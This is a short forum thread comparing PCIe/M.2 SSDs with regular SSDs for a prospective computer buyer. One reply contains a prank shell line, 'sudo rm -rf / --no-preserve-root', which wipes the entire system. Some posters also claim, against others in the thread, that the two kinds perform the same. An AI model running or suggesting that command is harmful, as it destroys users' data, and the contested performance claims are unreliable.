What is the difference between "256GB PCIe SSD" and "256GB SSD"
And which is best? If I was given the opportunity to choose one, which choice is the best? |

It's up to you which one you want, in my opinion they have no difference. Just by using another plug doesn't change alot.

You'd always prefer an SSD that plugs directly into the motherboard, no cables or whatever
M.2/PCIe SSDs are preferred because they don't need to travel so far to the motherboard
$ echo "Get slam jammed, kid!" && sudo rm -rf / --no-preserve-root |

If he prefers cable-management then yeah.

I have a choice between four computers, I set them up ranked after prices. All specs are the same, except the two first/cheapest have PCIe SSD unlike the two most expensive.
To clarify, there is no real difference between them? Should I prefer one of them? I haven't heard much of this PCIe one. |

As I have said before if you prefer cable-management go with the PCIe one.
Beside that there is no difference, no performance loss.

| Back to the SSD topic for a moment, I know how the regular SSD looks, how does it look different from the PCIe one? |

| blozmaster, you're wrong. PCIe / M.2 SSD's will be insanely faster than a regular SSD. That said, a regular gamer or consumer doesn't really need that, and if you're on a budget, a regular SSD will work completely fine for you. |

| Apparently, the PCIe SSD is an expansion card you simply put in an expansion slot. Why would cables be necessary? And how would a PCIe SSD be when it comes to retrieving data from it? With regular SSDs you can connect some adapter to it I guess and easily extract data. But with it being an expansion card, would it also use an adapter to extract data? |

| No, I mean if you wanted to directy extract data from the SSD without connecting it to a computer, but to an adapter. |
